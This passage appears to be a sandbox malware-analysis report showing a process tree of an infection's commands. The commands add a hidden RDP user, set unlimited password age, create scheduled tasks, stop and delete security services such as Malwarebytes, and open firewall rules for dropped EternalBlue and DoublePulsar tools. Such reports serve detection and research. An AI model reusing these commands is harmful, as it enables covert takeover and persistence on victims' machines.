        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        
        PID:656
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:8868
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:8572
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8860
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:240
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7916
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:6844
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Executes dropped EXE
        
        PID:5948
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\625B.tmp\625C.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:5428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Drops file in System32 directory
        
        PID:3408
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2412
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:8164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:7220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "svchost" /F
        7⤵
        
        PID:7580
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "svchost" /F
        8⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F
        7⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Updates\jFvfxe" /F
        8⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F
        7⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Updates\jFvfxe" /F
        8⤵
        
        PID:2764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:2352
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:5776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:8892
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:5884
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Creates scheduled task(s)
        
        PID:5608
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:4340
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:7832
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:2920
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:4128
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:5772
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:8960
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:9136
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:3368
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:6524
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:7336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:7384
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:6964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:2780
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:6572
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:2584
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:7812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:3012
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:7404
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:7552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:5008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:6564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:5888
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:6932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:8016
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:5696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:6512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:6236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:7148
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:5284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:7828
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:8468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:6224
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:9164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:1844
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7572
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:8852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:9212
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:7284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:3360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:8956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:8720
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:9060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:8864
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:7084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:8716
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:9040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:8740
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:8076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:8300
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:4272
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:8020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:5276
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:8964
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:6972
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:8780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:5380
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:9104
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:4436
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:8316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:6000
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:8516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:7784
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:8040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    PID:5520
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:9196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:2656
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:7052
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:6104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:6964
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:8520
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:4332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:6688
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    PID:424
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:7328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    PID:7676
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:6088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:7380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7796
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:684
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2704
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:3500
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6212
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:2508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:2256
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8740
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:8648
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6520
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:2428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8516
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:8692
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:5052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9104
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:4812
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:5864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:8124
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:5736
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8396
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:1864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6576
